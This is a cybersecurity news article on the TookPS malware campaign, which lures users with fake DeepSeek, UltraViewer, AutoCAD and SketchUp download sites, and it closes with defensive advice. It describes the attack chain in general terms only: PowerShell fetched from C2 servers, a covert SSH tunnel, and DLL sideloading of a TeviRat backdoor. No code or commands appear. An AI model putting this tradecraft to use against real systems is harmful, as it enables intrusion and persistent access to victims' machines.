In recent developments, cybersecurity researchers have identified a sophisticated malware campaign that leverages the popularity of DeepSeek, a Chinese AI chatbot, and various remote desktop applications to distribute the TookPS malware. This campaign underscores the evolving tactics of cybercriminals who exploit trending technologies to infiltrate systems and compromise sensitive data.
DeepSeek’s Rise and Associated Cyber Threats
DeepSeek, often referred to as the ChatGPT of China, has rapidly gained prominence in the AI landscape. Its cost-effectiveness and performance have attracted a substantial user base, making it a prime target for cyber adversaries. In January 2025, DeepSeek reported large-scale malicious attacks that disrupted user registrations, highlighting the platform’s vulnerability to cyber threats. ([apnews.com](https://apnews.com/article/be414acadbf35070d7645fe9fbd8f464?utm_source=openai))
Malware Campaign Overview
The TookPS malware campaign initially utilized DeepSeek as a lure to entice users into downloading malicious software. However, the campaign has since expanded its scope, impersonating legitimate business tools such as UltraViewer, AutoCAD, and SketchUp. By creating fraudulent websites that mimic official sources, attackers deceive users into downloading compromised versions of these applications.
Infection Mechanism and Persistence
Upon execution, the TookPS malware establishes communication with command and control (C2) servers using domains registered in early 2024. The malware retrieves base64-encoded PowerShell scripts that facilitate persistent access to the compromised system. The infection chain involves multiple stages:
1. Initial Infection: The user downloads and executes a malicious file disguised as a legitimate application.
2. C2 Communication: The malware contacts its C2 servers to download additional PowerShell scripts.
3. SSH Tunnel Establishment: The scripts download SSH components and set up a covert tunnel between the infected device and the attacker’s server, enabling unrestricted system access.
4. Deployment of Backdoors: Modified versions of known backdoors, such as Backdoor.Win32.TeviRat, are deployed using DLL sideloading techniques to compromise remote access software like TeamViewer.
Technical Analysis of the SSH Tunnel
A critical component of the TookPS malware is the establishment of an SSH tunnel that provides attackers with full system access. The malware executes commands to initiate an SSH server, creating a tunnel between the infected device and the attacker’s remote server. For authentication, it utilizes an RSA key downloaded earlier, with configuration sourced from a separate config file. This setup allows attackers to execute arbitrary commands and maintain persistent access to the victim’s environment.
Broader Implications and Related Threats
The exploitation of DeepSeek is not an isolated incident. Cybercriminals have also been observed using weaponized Google Ads to target DeepSeek users, directing them to malicious websites that distribute malware. Additionally, fake DeepSeek-themed websites have been set up to steal credentials, seize browser cookies, and access cryptocurrency wallets. ([cybersecuritynews.com](https://cybersecuritynews.com/weaponized-google-ads-attacking-deepseek-users/?utm_source=openai), [cybernews.com](https://cybernews.com/security/deepseek-captcha-info-stealing-malware/?utm_source=openai))
Recommendations for Users and Organizations
To mitigate the risks associated with such sophisticated malware campaigns, users and organizations are advised to:
– Verify Sources: Always download software from official and reputable sources.
– Exercise Caution with Ads: Be wary of sponsored search results and advertisements, as they may lead to malicious websites.
– Implement Security Measures: Utilize comprehensive security solutions that can detect and prevent malware infections.
– Stay Informed: Keep abreast of the latest cybersecurity threats and tactics employed by cybercriminals.
By adopting these practices, users can enhance their security posture and reduce the likelihood of falling victim to such malicious campaigns.
